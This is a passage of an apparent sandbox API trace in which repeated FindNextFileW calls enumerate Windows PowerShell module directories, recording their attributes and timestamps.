ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0151.372] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0151.372] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0151.372] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0151.373] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0151.373] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0151.373] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0151.373] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0151.374] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0151.374] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0151.374] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0151.374] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0151.375] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0151.375] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0151.375] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0151.376] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0151.376] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0151.376] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0151.376] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0151.377] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0151.377] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0151.377] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0151.378] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0151.378] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0151.378] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0151.379] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0151.379] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0151.379] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0151.379] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0151.380] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0151.380] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0151.381] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0151.381] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0151.381] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0151.381] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0151.382] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0151.382] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0151.382] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0151.383] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0151.383] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0151.383] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0151.383] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0151.384] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0151.384] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0151.384] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0151.385] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0151.385] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, 